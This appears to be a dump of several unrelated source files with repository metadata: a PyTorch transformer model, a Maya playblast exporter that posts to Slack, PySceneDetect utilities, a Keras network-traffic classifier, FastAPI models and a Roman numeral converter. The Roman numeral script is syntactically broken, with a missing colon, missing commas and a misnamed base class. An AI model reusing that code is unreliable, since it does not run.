ljhahne/ARNe | 3,032,246,931,477 | 1b2be40a9c415aa6c5c46958e2c3b9972c5be758 | 6398c22bcb07a11a783fa93e8c7ea8a60f2b3322 | /models/WReNTransformer.py | 3b1b1d64f81283a7a46af1120a74576f71a3d4ef | []
| no_license | https://github.com/ljhahne/ARNe | 4ce60e30684f22356709d573935d0a7a91e6dfcf | c438d0df31fd1536291ccc8ba90b23edeb8c2af0 | refs/heads/main | 2023-07-16T18:09:55.495323 | 2021-08-24T19:17:52 | 2021-08-24T19:17:52 | 398,060,141 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | import torch
import torch.nn as nn
from .Transformer import Encoder
class WReNTransformer(nn.Module):
def __init__(self, config_transformer, N, d_classifier=[256, 256, 256, 13], use_delimiter=False,
old_transformer_model=False):
super().__init__()
self.N = N
self.d_model = config_transformer["d_model"]
self.n_labels = d_classifier[-1]
self.use_delimiter = use_delimiter
# should only be set by function
self.attention_maps = False
if use_delimiter:
self.N += 1
self.encoder_transformer = Encoder(
self.N,
d_model=config_transformer["d_model"],
n_layers=config_transformer["n_layers"],
h=config_transformer["h"],
d_ff=config_transformer["d_ff"],
d_v=config_transformer["d_v"],
d_k=config_transformer["d_k"],
d_q=config_transformer["d_q"],
dropout_dot_product=config_transformer["dropout"],
dropout_fc=config_transformer["dropout"],
dropout_pos_ff=config_transformer["dropout"],
old_transformer_model=old_transformer_model
)
d_classifier[0] = config_transformer["d_model"]
theta_features = [config_transformer["d_model"] for i in range(5)]
self.g_theta_transformer = nn.Sequential(*[layer for i in range(len(theta_features) - 1) for layer in
[nn.Linear(in_features=theta_features[i],
out_features=theta_features[i + 1]),
nn.ReLU()]])
layers = [nn.Linear(in_features=d_classifier[0], out_features=d_classifier[1]), nn.ReLU(),
nn.Dropout(p=0.5),
nn.Linear(in_features=d_classifier[1], out_features=d_classifier[2]), nn.ReLU(),
nn.Linear(in_features=d_classifier[2], out_features=d_classifier[3])
]
self.classifier_transformer = nn.Sequential(*layers)
def get_attention_maps_data(self):
attentions = self.encoder_transformer.get_attention_maps_data()
return attentions
def return_attention_maps(self, state):
self.attention_maps = state
self.encoder_transformer.return_attention_maps(state)
def forward(self, chi, i_iteration=None):
"""
encoded_panel_sequence --> encoder_transformer --> MLP each sequence element + sum them up --> classifier --> [RETURN] logits
:return: logits
"""
if self.attention_maps == True:
self.encoder_transformer.set_iteration(i_iteration)
x = self.encoder_transformer(chi)
assert (self.N, self.d_model) == x.shape[1:]
x = torch.sum(self.g_theta_transformer(x), dim=1)
assert (self.d_model,) == x.shape[1:]
logits = self.classifier_transformer(x)
assert (self.n_labels,) == logits.shape[1:]
return logits | UTF-8 | Python | false | false | 3,032 | py | 18 | WReNTransformer.py | 15 | 0.568602 | 0.559037 | 0 | 79 | 37.392405 | 133 |
sysrnd/Maya_Animacion_PlayblastExporter | 17,858,474,024,541 | b639549d820ce4938ef7043cca95f3d1db1322eb | 1ae93fdcd8446509c3c722df70e3332443c4ffb3 | /playblastExport_Core/playblastExportBridge.py | 967e914dbd4d963c87a5b4c9d915ebb24a17fa0d | []
| no_license | https://github.com/sysrnd/Maya_Animacion_PlayblastExporter | 571fa57707b48f9c5c228fc6752df8d74bfd7eb5 | 217e4dbbb91827baa34fbed389a8b854ef8d88f2 | refs/heads/master | 2021-09-04T22:14:53.863115 | 2018-01-22T16:16:52 | 2018-01-22T16:16:52 | 113,534,142 | 2 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | from Modules.Qt import QtCore
import Animacion.Maya_Animacion_PlayblastExporter.playblastExport_Core.MKF_playblastCore
reload(Animacion.Maya_Animacion_PlayblastExporter.playblastExport_Core.MKF_playblastCore)
from Animacion.Maya_Animacion_PlayblastExporter.playblastExport_Core.MKF_playblastCore import playblastExport
import Animacion.Maya_Animacion_PlayblastExporter.playblastExport_Core.MKF_SlackMessages
reload(Animacion.Maya_Animacion_PlayblastExporter.playblastExport_Core.MKF_SlackMessages)
from Animacion.Maya_Animacion_PlayblastExporter.playblastExport_Core.MKF_SlackMessages import Slack
import os
class BridgeActions():
def __init__(self, window_interface):
"""
Start Interfaces control.
This method creates buttons to analize what actions
will evaluate the class.
"""
self.master_window = window_interface
# Create buttons identifiers main window
self.txt_artistName = window_interface.txt_artistName
self.txt_path = window_interface.txt_path
self.btn_accept = window_interface.btn_accept
self.btn_path = window_interface.btn_path
self.rdbtn_local = window_interface.rdbtn_local
self.rdbtn_server = window_interface.rdbtn_server
# Make buttons connections
self.rdbtn_local.setChecked(True)
self.btn_accept.clicked.connect(self.accept)
self.btn_path.clicked.connect(self.path)
self.rdbtn_local.toggled.connect(self.changeRadioSignal)
self.rdbtn_server.toggled.connect(self.changeRadioSignal)
self.playblast = playblastExport()
self.slack = Slack()
self.path = self.playblast.getDocsPath()
self.autoComplete()
def accept(self):
"""
"""
txt = self.txt_artistName.text()
path = self.txt_path.text()
self.writeLocalInfo(self.path + '/artist.txt', txt)
name = self.playblast.fileName()
if self.rdbtn_server.isChecked():
if path.find('Z:/') != -1 or path.find('//master') != -1:
self.playblast.main(txt, path)
self.slack.MessageSlack(Message = 'Se ha salvado el playblast *' + name + '* del animador *' + txt + '*.\n En la ruta: *' + path +'*', channel = 'playblasts')
#self.slack.MessageSlack(Message = 'ya no funciona esta chingadera', channel = 'tickets_test')
else:
self.playblast.warnings(txt)
else:
self.playblast.main(txt, path)
def path(self):
local = self.rdbtn_local.isChecked()
path = self.playblast.path()
if local:
self.txt_path.setText(path)
self.writeLocalInfo(self.path + '/localpath.txt', self.txt_path.text())
else:
self.txt_path.setText(path)
self.writeLocalInfo(self.path + '/serverpath.txt', self.txt_path.text())
def autoComplete(self):
self.readLocalInfo(self.path + '/localpath.txt', self.txt_path)
self.readLocalInfo(self.path + '/artist.txt', self.txt_artistName)
def readLocalInfo(self, file, txt):
if os.path.exists(file + '.txt'):
with open(file + '.txt' ,'r') as f:
data = f.read()
txt.setText(data)
return True
else:
return False
def writeLocalInfo(self, file, txt):
with open(file + '.txt' ,'w') as f:
data = f.write(txt)
def changeRadioSignal(self):
if self.rdbtn_local.isChecked():
self.readLocalInfo(self.path + '/localpath.txt', self.txt_path)
else:
self.readLocalInfo(self.path + '/serverpath.txt', self.txt_path)
| UTF-8 | Python | false | false | 3,787 | py | 9 | playblastExportBridge.py | 7 | 0.623713 | 0.623185 | 0 | 175 | 20.577143 | 174 |
adorsk-noaa/georefine | 10,840,497,469,544 | 93d13ac19bcbc2b24133cab3d8f97b5b1ea9ad22 | a77776b362c361933a02f91692b0ae112a6ca33c | /georefine/app/projects/models.py | 8205a912c2b2f2ca9b485238eb210e090ec41e8e | []
| no_license | https://github.com/adorsk-noaa/georefine | 3114a66a6eaafe8ab68df8e75ec16f0286e68c6d | 237ab00be4b028e90fccdf82cc15c5cd88fe3a34 | refs/heads/master | 2021-01-25T12:02:10.909344 | 2013-03-13T19:58:26 | 2013-03-13T19:58:26 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from georefine.app import db
from sqlalchemy import (Table, Column, Integer, String, Text, ForeignKey,
PickleType)
from sqlalchemy.orm import mapper, relationship, backref
class Project(object):
def __init__(self, id=None, name=None, schema=None, data_dir=None,
static_dir=None, static_url=None):
self.id = id
self.name = name
self.schema = schema
self.data_dir = data_dir
self.static_dir = static_dir
self.static_url = static_url
project_table = Table('project_projects', db.metadata,
Column('id', Integer, primary_key=True),
Column('name', String),
Column('schema', PickleType),
Column('data_dir', String),
Column('db_uri', String),
Column('static_dir', String),
Column('static_url', String),
)
mapper(Project, project_table)
| UTF-8 | Python | false | false | 891 | py | 62 | models.py | 53 | 0.606061 | 0.606061 | 0 | 27 | 32 | 73 |
wjs018/PySceneDetect | 17,781,164,642,933 | a6ce56c61a672fe7002a6192419ced759ba7f853 | 7c8c7245e87fec996b2b956ad0438b0d87a45aa4 | /scenedetect/platform.py | 4f3dae9cafe60107fa9a3a16f7a5e8b9501f3f93 | [
"BSD-3-Clause",
"Python-2.0"
]
| permissive | https://github.com/wjs018/PySceneDetect | 4d663ca03d236ea031c2e31423cef341a7d4183e | 456ed933ebf5d4c222c0458fc90b06bc9a3500c5 | refs/heads/master | 2023-07-05T08:13:30.564699 | 2023-05-22T00:56:07 | 2023-05-22T00:56:07 | 159,362,599 | 0 | 0 | NOASSERTION | true | 2018-11-27T16:05:54 | 2018-11-27T16:05:54 | 2018-11-26T14:36:09 | 2018-09-23T19:48:31 | 56,098 | 0 | 0 | 0 | null | false | null | # -*- coding: utf-8 -*-
#
# PySceneDetect: Python-Based Video Scene Detector
# ---------------------------------------------------------------
# [ Site: http://www.scenedetect.scenedetect.com/ ]
# [ Docs: http://manual.scenedetect.scenedetect.com/ ]
# [ Github: https://github.com/Breakthrough/PySceneDetect/ ]
#
# Copyright (C) 2014-2022 Brandon Castellano <http://www.bcastell.com>.
# PySceneDetect is licensed under the BSD 3-Clause License; see the
# included LICENSE file, or visit one of the above pages for details.
#
""" ``scenedetect.platform`` Module
This moduke contains all platform/library specific compatibility fixes, as well as some utility
functions to handle logging and invoking external commands.
"""
import importlib
import logging
import os
import os.path
import platform
import subprocess
import sys
from typing import AnyStr, Dict, List, Optional, Union
import cv2
##
## tqdm Library
##
class FakeTqdmObject:
"""Provides a no-op tqdm-like object."""
# pylint: disable=unused-argument
def __init__(self, **kawrgs):
"""No-op."""
def update(self, n=1):
"""No-op."""
def close(self):
"""No-op."""
def set_description(self, desc=None, refresh=True):
"""No-op."""
# pylint: enable=unused-argument
class FakeTqdmLoggingRedirect:
"""Provides a no-op tqdm context manager for redirecting log messages."""
# pylint: disable=redefined-builtin,unused-argument
def __init__(self, **kawrgs):
"""No-op."""
def __enter__(self):
"""No-op."""
def __exit__(self, type, value, traceback):
"""No-op."""
# pylint: enable=redefined-builtin,unused-argument
# Try to import tqdm and the logging redirect, otherwise provide fake implementations..
try:
# pylint: disable=unused-import
from tqdm import tqdm
from tqdm.contrib.logging import logging_redirect_tqdm
# pylint: enable=unused-import
except ModuleNotFoundError:
# pylint: disable=invalid-name
tqdm = FakeTqdmObject
logging_redirect_tqdm = FakeTqdmLoggingRedirect
# pylint: enable=invalid-name
##
## OpenCV imwrite Supported Image Types & Quality/Compression Parameters
##
# TODO: Move this into scene_manager.
def get_cv2_imwrite_params() -> Dict[str, Union[int, None]]:
""" Get OpenCV imwrite Params: Returns a dict of supported image formats and
their associated quality/compression parameter index, or None if that format
is not supported.
Returns:
Dictionary of supported image formats/extensions ('jpg', 'png', etc...) mapped to the
respective OpenCV quality or compression parameter as {'jpg': cv2.IMWRITE_JPEG_QUALITY,
'png': cv2.IMWRITE_PNG_COMPRESSION, ...}. Parameter will be None if not found on the
current system library (e.g. {'jpg': None}).
"""
def _get_cv2_param(param_name: str) -> Union[int, None]:
if param_name.startswith('CV_'):
param_name = param_name[3:]
try:
return getattr(cv2, param_name)
except AttributeError:
return None
return {
'jpg': _get_cv2_param('IMWRITE_JPEG_QUALITY'),
'png': _get_cv2_param('IMWRITE_PNG_COMPRESSION'),
'webp': _get_cv2_param('IMWRITE_WEBP_QUALITY')
}
##
## File I/O
##
def get_file_name(file_path: AnyStr, include_extension=True) -> AnyStr:
"""Return the file name that `file_path` refers to, optionally removing the extension.
If `include_extension` is False, the result will always be a str.
E.g. /tmp/foo.bar -> foo"""
file_name = os.path.basename(file_path)
if not include_extension:
file_name = str(file_name)
last_dot_pos = file_name.rfind('.')
if last_dot_pos >= 0:
file_name = file_name[:last_dot_pos]
return file_name
def get_and_create_path(file_path: AnyStr, output_directory: Optional[AnyStr] = None) -> AnyStr:
""" Get & Create Path: Gets and returns the full/absolute path to file_path
in the specified output_directory if set, creating any required directories
along the way.
If file_path is already an absolute path, then output_directory is ignored.
Arguments:
file_path: File name to get path for. If file_path is an absolute
path (e.g. starts at a drive/root), no modification of the path
is performed, only ensuring that all output directories are created.
output_dir: An optional output directory to override the
directory of file_path if it is relative to the working directory.
Returns:
Full path to output file suitable for writing.
"""
# If an output directory is defined and the file path is a relative path, open
# the file handle in the output directory instead of the working directory.
if output_directory is not None and not os.path.isabs(file_path):
file_path = os.path.join(output_directory, file_path)
# Now that file_path is an absolute path, let's make sure all the directories
# exist for us to start writing files there.
os.makedirs(os.path.split(os.path.abspath(file_path))[0], exist_ok=True)
return file_path
##
## Logging
##
def init_logger(log_level: int = logging.INFO,
show_stdout: bool = False,
log_file: Optional[str] = None):
"""Initializes logging for PySceneDetect. The logger instance used is named 'pyscenedetect'.
By default the logger has no handlers to suppress output. All existing log handlers are replaced
every time this function is invoked.
Arguments:
log_level: Verbosity of log messages. Should be one of [logging.INFO, logging.DEBUG,
logging.WARNING, logging.ERROR, logging.CRITICAL].
show_stdout: If True, add handler to show log messages on stdout (default: False).
log_file: If set, add handler to dump log messages to given file path.
"""
# Format of log messages depends on verbosity.
format_str = '[PySceneDetect] %(message)s'
if log_level == logging.DEBUG:
format_str = '%(levelname)s: %(module)s.%(funcName)s(): %(message)s'
# Get the named logger and remove any existing handlers.
logger_instance = logging.getLogger('pyscenedetect')
logger_instance.handlers = []
logger_instance.setLevel(log_level)
# Add stdout handler if required.
if show_stdout:
handler = logging.StreamHandler(stream=sys.stdout)
handler.setLevel(log_level)
handler.setFormatter(logging.Formatter(fmt=format_str))
logger_instance.addHandler(handler)
# Add file handler if required.
if log_file:
log_file = get_and_create_path(log_file)
handler = logging.FileHandler(log_file)
handler.setLevel(log_level)
handler.setFormatter(logging.Formatter(fmt=format_str))
logger_instance.addHandler(handler)
##
## Running External Commands
##
class CommandTooLong(Exception):
"""Raised if the length of a command line argument exceeds the limit allowed on Windows."""
def invoke_command(args: List[str]) -> int:
""" Same as calling Python's subprocess.call() method, but explicitly
raises a different exception when the command length is too long.
See https://github.com/Breakthrough/PySceneDetect/issues/164 for details.
Arguments:
args: List of strings to pass to subprocess.call().
Returns:
Return code of command.
Raises:
CommandTooLong: `args` exceeds built in command line length limit on Windows.
"""
try:
return subprocess.call(args)
except OSError as err:
if os.name != 'nt':
raise
exception_string = str(err)
# Error 206: The filename or extension is too long
# Error 87: The parameter is incorrect
to_match = ('206', '87')
if any([x in exception_string for x in to_match]):
raise CommandTooLong() from err
raise
def get_ffmpeg_path() -> Optional[str]:
"""Get path to ffmpeg if available on the current system, or None if not available."""
# Prefer using ffmpeg if it already exists in PATH.
try:
subprocess.call(['ffmpeg', '-v', 'quiet'])
return 'ffmpeg'
except OSError:
pass
# Failed to invoke ffmpeg from PATH, see if we have a copy from imageio_ffmpeg.
try:
# pylint: disable=import-outside-toplevel
from imageio_ffmpeg import get_ffmpeg_exe
# pylint: enable=import-outside-toplevel
subprocess.call([get_ffmpeg_exe(), '-v', 'quiet'])
return get_ffmpeg_exe()
# Gracefully handle case where imageio_ffmpeg is not available.
except ModuleNotFoundError:
pass
# Handle case where path might be wrong/non-existent.
except OSError:
pass
# get_ffmpeg_exe may throw a RuntimeError if the executable is not available.
except RuntimeError:
pass
return None
def get_ffmpeg_version() -> Optional[str]:
"""Get ffmpeg version identifier, or None if ffmpeg is not found. Uses `get_ffmpeg_path()`."""
ffmpeg_path = get_ffmpeg_path()
if ffmpeg_path is None:
return None
# If get_ffmpeg_path() returns a value, the path it returns should be invokable.
output = subprocess.check_output(args=[ffmpeg_path, '-version'], text=True)
output_split = output.split()
if len(output_split) >= 3 and output_split[1] == 'version':
return output_split[2]
# If parsing the version fails, return the entire first line of output.
return output.splitlines()[0]
def get_mkvmerge_version() -> Optional[str]:
"""Get mkvmerge version identifier, or None if mkvmerge is not found in PATH."""
tool_name = 'mkvmerge'
try:
output = subprocess.check_output(args=[tool_name, '--version'], text=True)
except FileNotFoundError:
return None
output_split = output.split()
if len(output_split) >= 1 and output_split[0] == tool_name:
return ' '.join(output_split[1:])
# If parsing the version fails, return the entire first line of output.
return output.splitlines()[0]
def get_system_version_info() -> str:
"""Get the system's operating system, Python, packages, and external tool versions.
Useful for debugging or filing bug reports.
Used for the `scenedetect version -a` command.
"""
output_template = '{:<12} {}'
line_separator = '-' * 60
not_found_str = '[Not Found]'
out_lines = []
# System (Python, OS)
out_lines += ['System Version Info', line_separator]
out_lines += [
output_template.format(name, version) for name, version in (
('OS', '%s' % platform.platform()),
('Python', '%d.%d.%d' % sys.version_info[0:3]),
)
]
# Third-Party Packages
out_lines += ['', 'Package Version Info', line_separator]
backend_modules = (
'appdirs',
'av',
'click',
'cv2',
'moviepy',
'numpy',
'tqdm',
)
for module_name in backend_modules:
try:
module = importlib.import_module(module_name)
out_lines.append(output_template.format(module_name, module.__version__))
except ModuleNotFoundError:
out_lines.append(output_template.format(module_name, not_found_str))
# External Tools
out_lines += ['', 'Tool Version Info', line_separator]
tool_version_info = (
('ffmpeg', get_ffmpeg_version()),
('mkvmerge', get_mkvmerge_version()),
)
for (tool_name, tool_version) in tool_version_info:
out_lines.append(
output_template.format(tool_name, tool_version if tool_version else not_found_str))
return '\n'.join(out_lines)
| UTF-8 | Python | false | false | 11,772 | py | 65 | platform.py | 36 | 0.647638 | 0.643306 | 0 | 347 | 32.925072 | 100 |
golian1204/exemples | 4,655,744,551,572 | 9db4c08b9982d62d8b6021a3072c7a16b843adb5 | 5a22f8a55d53ff342b4072622f5f0f590eb2be68 | /mess/serializers/feedback.py | 85ff2b06ff03df4638afb7134bdd1d9d0024cabe | []
| no_license | https://github.com/golian1204/exemples | a4b317f2544aa3796e00652fa9372023e9aafe49 | 294ea708f839919fe20b584533db73dd71837b7b | refs/heads/master | 2021-09-09T21:18:10.729893 | 2018-03-19T19:05:20 | 2018-03-19T19:05:20 | 125,905,286 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from rest_framework import serializers
from mess.models.feedback import Valuation
class ValuationSerializer(serializers.ModelSerializer):
class Meta:
model = Valuation
fields = '__all__'
def create(self, validated_data):
return Valuation.objects.create(**validated_data)
def update(self, instance, validated_data):
instance.scale = validated_data.get('scale', instance.scale)
instance.icon = validated_data.get('icon', instance.icon)
instance.save()
return instance
| UTF-8 | Python | false | false | 538 | py | 51 | feedback.py | 50 | 0.689591 | 0.689591 | 0 | 17 | 30.647059 | 68 |
jianjhu/Inspect | 8,194,797,612,766 | 263c37373e961edd60ccffa58b90a1b67739a938 | 8ceb5b655089c08bcecfab7379d9f9f0dace657a | /Inspector.py | 96e7b449f7b99ae5be91d942f976c19d72ebf25b | [
"Apache-2.0"
]
| permissive | https://github.com/jianjhu/Inspect | 72315675673f27724cc7b650674fb33a2222c27a | 3d16457b555359553b54441d616a5e299fe1550b | refs/heads/master | 2020-03-27T07:20:20.272435 | 2018-09-28T08:48:24 | 2018-09-28T08:48:24 | 146,183,122 | 3 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import keras
import numpy
from datasethdr import get_dataset3
from datasethdr import n, m
voice_train_files = ['DataSet/Voice.csv']
no_voice_train_files = ['DataSet/noVoice.csv']
webex_normalshare_train_files = ['DataSet/normalshare']
highFPS_train_files = ['DataSet/HighFPS.csv']
webex_ppt_train_files = ['DataSet/highfps_ppt.csv', 'DataSet/normal_ppt.csv']
webex_video_train_files = ['DataSet/highfps_video.csv', 'DataSet/normal_video.csv']
WEBEX_PPT_LABEL = 0
WEBEX_VIDEO_LABEL = 1
VOICE_LABEL = 2
OTHER_LABEL = 3
src = '10.224.168.94'
batch_size = 128
num_classes = 4
epochs = 10
input_shape = (n, 2 * m)
if __name__ == '__main__':
webex_ppt_train_dataset = None
for fi in webex_ppt_train_files:
dataset = get_dataset3(fi, '10.224.168.94')
# draw_dataset(dataset[0])
if webex_ppt_train_dataset is None:
webex_ppt_train_dataset = dataset
else:
webex_ppt_train_dataset += dataset
ppt_train_label = [WEBEX_PPT_LABEL] * len(webex_ppt_train_dataset)
print("get %d ppt train dataset" % len(webex_ppt_train_dataset))
webex_video_train_dataset = None
for fi in webex_video_train_files:
dataset = get_dataset3(fi, '10.224.168.94')
# draw_dataset(dataset[0])
if webex_video_train_dataset is None:
webex_video_train_dataset = dataset
else:
webex_video_train_dataset += dataset
video_train_label = [WEBEX_VIDEO_LABEL] * len(webex_video_train_dataset)
print("get %d video train dataset" % len(webex_video_train_dataset))
for fi in voice_train_files:
voice_train_dataset = get_dataset3(fi, '192.168.31.219')
voice_train_label = [VOICE_LABEL] * len(voice_train_dataset)
# draw_dataset(voice_train_dataset[0])
print("get %d voice train dataset"%len(voice_train_dataset))
for fi in no_voice_train_files:
other_train_dataset = get_dataset3(fi, '192.168.31.219')
other_train_label = [OTHER_LABEL] * len(other_train_dataset)
#draw_dataset(other_train_dataset[0])
print("get %d other train dataset"%len(other_train_dataset))
x_train = webex_ppt_train_dataset + webex_video_train_dataset + voice_train_dataset + other_train_dataset
y_train = ppt_train_label + video_train_label + voice_train_label + other_train_label
test_data_num = len(x_train) / 10
import random
index = [i for i in range(len(x_train))]
random.shuffle(index)
data = []
label = []
for i in index:
data.append(x_train[i])
label.append(y_train[i])
x_train = data[:-test_data_num]
y_train = label[:-test_data_num]
x_train = numpy.array(x_train)
print x_train.shape
x_train = x_train.reshape((x_train.shape[0], x_train.shape[1], x_train.shape[2] * x_train.shape[3]))
y_train = keras.utils.to_categorical(y_train, num_classes)
print y_train.shape
x_test = data[-test_data_num:]
x_test = numpy.array(x_test)
print x_test.shape
x_test = x_test.reshape((x_test.shape[0], x_test.shape[1], x_test.shape[2] * x_test.shape[3]))
y_test = label[-test_data_num:]
y_test = keras.utils.to_categorical(y_test, num_classes)
print y_test.shape
from keras.layers import LSTM
from keras.models import Sequential
from keras.layers import Conv1D
from keras.layers import Dense
from keras.layers import Dropout
model = Sequential()
model.add(Conv1D(32, n / 10 + 1, input_shape=input_shape))
model.add(LSTM(128))
model.add(Dense(128, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss=keras.losses.categorical_crossentropy,
optimizer=keras.optimizers.Adadelta(),
metrics=['accuracy'])
tb_cb = keras.callbacks.TensorBoard(log_dir='keras_log', write_images=1, histogram_freq=1)
model.fit(x_train, y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
callbacks=[tb_cb],
validation_data=(x_test, y_test))
x_ev = x_test
y_ev = y_test
score = model.evaluate(x_ev, y_ev, verbose=0)
print('Test loss:', score[0])
print('Test accuracy:', score[1])
model.save('inspect.h5')
| UTF-8 | Python | false | false | 4,285 | py | 11 | Inspector.py | 5 | 0.641774 | 0.617503 | 0 | 126 | 33 | 109 |
FRANKSADWAR/HedonicHouseModels | 5,909,875,043,856 | aacfd2bf40d084c11b6c00f65a3dae8cf866793a | 5928dc0c33e19a95571b53b6a7670d87dba1f594 | /route_test.py | fd36b56ff2fe3fc26d4f293b4579538520c813e9 | [
"Apache-2.0"
]
| permissive | https://github.com/FRANKSADWAR/HedonicHouseModels | cdc85745d15a81e3740e6d813e09cf9aca48f7af | 243dbe08c6798a87efe86fcc9ed2e14745769c78 | refs/heads/main | 2022-12-27T12:34:34.616153 | 2020-10-10T11:27:21 | 2020-10-10T11:27:21 | 302,886,041 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import traceback
from django.contrib.gis import db
from django.db import connection,connections
from geojson import loads,Feature,FeatureCollection
import geojson
import psycopg2
import json
import math
import logging
logger = logging.getLogger(__name__)
database = 'routes_test'
user = 'postgres'
password = 'RootRender90'
conn = psycopg2.connect(database=database,user=user,password=password)
def getNearest(x,y):
"""
params : x
: y
using the k-nearest neighbour to get the nearest vertex given a set of coordinates
"""
query = """
SELECT id FROM ways_noded_vertices_pgr ORDER BY
the_geom <-> ST_SetSRID(ST_Point(%s,%s),4326) LIMIT 1;
"""
cur = conn.cursor()
cur.execute(query,(x,y))
point = cur.fetchone()
return point
def getShortest(gid):
"""
This query runs the pgr_dijkstra algorithm to return the shortest route between
start and end nodes.
param gid: id of the nearest vertex to the store returned by the getNearest function
"""
start_id = getNearest(36.852721,-1.313261)
query_sho = """
SELECT dijkstra.*,ST_AsGeoJSON(ways_noded.the_geom) as route_geom,ways_noded.length FROM
pgr_dijkstra('SELECT id,source,target,cost,reverse_cost FROM ways_noded',85038,%s)
AS dijkstra LEFT JOIN ways_noded ON (edge=id);
"""
cur = conn.cursor()
cur.execute(query_sho,gid)
data = cur.fetchall()
last_row = data.pop() # remove the last row since it has no geometry information and also has a NoneType value for length
route_result = []
route_length = []
total_cost = last_row[5] # the index 5 of the last row gives the aggregate cost of the route, get it as the total cost of the route
# iterate over the query results to get the route geometryand length
for seg in data:
lens = seg[7] # get the length value of each segment
seg_geom = seg[6] # get the geometry value of each segment
seg_geom_geojs = loads(seg_geom) # load the geometry as geojson, the geometry is Type string, so it allows loading as geojson
seg_feature = Feature(geometry=seg_geom_geojs,properties={}) # create a feature of the loaded geometries
route_length.append(lens) # append all the length values to this list in order to sum them later
route_result.append(seg_feature) # append all the created features to create a feature collection later
length_in_km = round(sum(route_length),2)
# create a feature collection from the features returned
route_details = FeatureCollection(route_result,distance_in_Km=length_in_km,time_in_minutes=total_cost)
try:
return str(route_details)
except:
logger.error("Error while creating GeoJSON file" + str(route_details))
logger.error(traceback.format_exc())
def getStoreXY():
query = """
SELECT x,y from stores;
"""
cur = conn.cursor()
cur.execute(query)
rows = cur.fetchall()
return rows
if __name__ == "__main__":
fr = getNearest(36.940559,-1.368009)
#if run as top level module
dataset = getShortest(fr)
print(dataset)
| UTF-8 | Python | false | false | 3,300 | py | 1 | route_test.py | 1 | 0.647273 | 0.632424 | 0 | 91 | 35.032967 | 136 |
CaMeLCa5e/TechnicalExamples | 7,765,300,901,265 | c9505a8ddf6a0102a3d1f2ff2215b98b95acff42 | 308a5086eba8414cd5174de4ebb8b54ab4b50012 | /RomanNumeral.py | 73be1770982f42bc78fa8ddefcfd8c4b1aada34b | []
| no_license | https://github.com/CaMeLCa5e/TechnicalExamples | cde8231ab248449e11ce3677f8ee718b9c940903 | 655b1911ceda92b9c981d7697652ae5b545f3cbf | refs/heads/master | 2021-01-23T05:45:55.354422 | 2014-10-22T03:44:36 | 2014-10-22T03:44:36 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | """
3. Write a method that converts its argument from integer to roman numeral """
import re
#Define exceptions
class roman_error (exception): pass
class out_of_range_error(roman_error): pass
class not_integer_error(roman_error): pass
class bad_roman_numeral_error (roman_error): pass
#Define conversion map
roman_numeral_map = (('M', 1000),
('CM', 900),
('D', 500),
('CD', 400)
('C', 100)
('XC', 90)
('L', 50)
('XL', 40)
('X', 10)
('IX', 9)
('V', 5)
('IV', 4)
('I', 1))
def to_roman(n):
#convert int to roman numeral
if not (0 < n < 4000):
raise out_of_range_error,
if int (n) <> n:
raise not_integer_error #can't convert a number that is not an int.
result = ''
for numeral, integer in roman_numeral_map
while n >= integer:
result += numeral
n-= integer
return result
# Define pattern to detect valid roman numerals
roman_numeral_pattern = '^M?M?M?(CM|CD|D?C?C?C?)(XC|XL|L?X?X?X?) (IX|IV|V?I?I?I?)$'
def from_roman(s):
#convert from roman numeral to int
if not re.search(roman_numeral_pattern, s):
raise invalid_roman_numeral_error, 'Invalid Roman numeral: %s' % s
result = 0
index = 0
for numeral, integer in roman_numeral_map:
while s[index:index+len(numeral)] == numeral:
result += integer
index += len(numeral)
return result
| UTF-8 | Python | false | false | 1,325 | py | 8 | RomanNumeral.py | 7 | 0.634717 | 0.607547 | 0 | 57 | 21.596491 | 83 |
codacy-badger/noobit-backend | 14,508,399,546,636 | 1b92dfa9a6e65d24efa3e1d1427c697fb7c10882 | b9abb3c31e98b95b4d21380d929897e70b1a4233 | /models/data_models/users.py | b7e7ecdd5f832da3328d10fa73b9cdb0eb0d5c5b | []
| no_license | https://github.com/codacy-badger/noobit-backend | 8b3cc4838990c08a1a830dce833a73c0a900f68c | 874372803d709d078947b38024856a926763fff4 | refs/heads/master | 2022-04-07T22:15:16.681500 | 2020-03-25T20:45:35 | 2020-03-25T20:45:35 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from fastapi_users import models
# FastAPI-Users models
class User(models.BaseUser):
pass
class UserCreate(User, models.BaseUserCreate):
pass
class UserUpdate(User, models.BaseUserUpdate):
pass
class UserDB(User, models.BaseUserDB):
pass
# Our own response model to filter out password and id
from pydantic import BaseModel, EmailStr
class UserDBOut(BaseModel):
email: EmailStr
id: str
class Config:
orm_mode = True
| UTF-8 | Python | false | false | 466 | py | 60 | users.py | 58 | 0.718884 | 0.718884 | 0 | 31 | 14.032258 | 54 |
dazhouxiaoyang/fastapi-pagination | 7,842,610,314,489 | 3678623ec2739dd8c69e547ebcab1d70990d7e10 | b1613ab7bf9b8ff89d24a7b4f4530170235d2fc5 | /tests/ext/test_async_sqlalchemy.py | 99b447d3e1e26db5de93d3b5f7c4ced30b5c4b20 | [
"MIT"
]
| permissive | https://github.com/dazhouxiaoyang/fastapi-pagination | 4352da16372c6bcff16c3c8a87ec0c5edfbc7f51 | 9048334db650ba521f1770e8990760f36beee45c | refs/heads/main | 2023-08-11T03:10:26.174664 | 2021-10-12T06:35:03 | 2021-10-12T06:35:03 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from typing import AsyncIterator
from fastapi import Depends, FastAPI
from pytest import fixture, mark
from sqlalchemy import Column, Integer, String
from sqlalchemy.ext.asyncio import AsyncSession, create_async_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.future import select
from sqlalchemy.orm import sessionmaker
from fastapi_pagination import LimitOffsetPage, Page, add_pagination
from fastapi_pagination.ext.async_sqlalchemy import paginate
from ..base import BasePaginationTestCase, SafeTestClient, UserOut
from ..utils import faker
@fixture(scope="session")
def database_url(database_url) -> str:
database_url = database_url.replace("postgresql", "postgresql+asyncpg", 1)
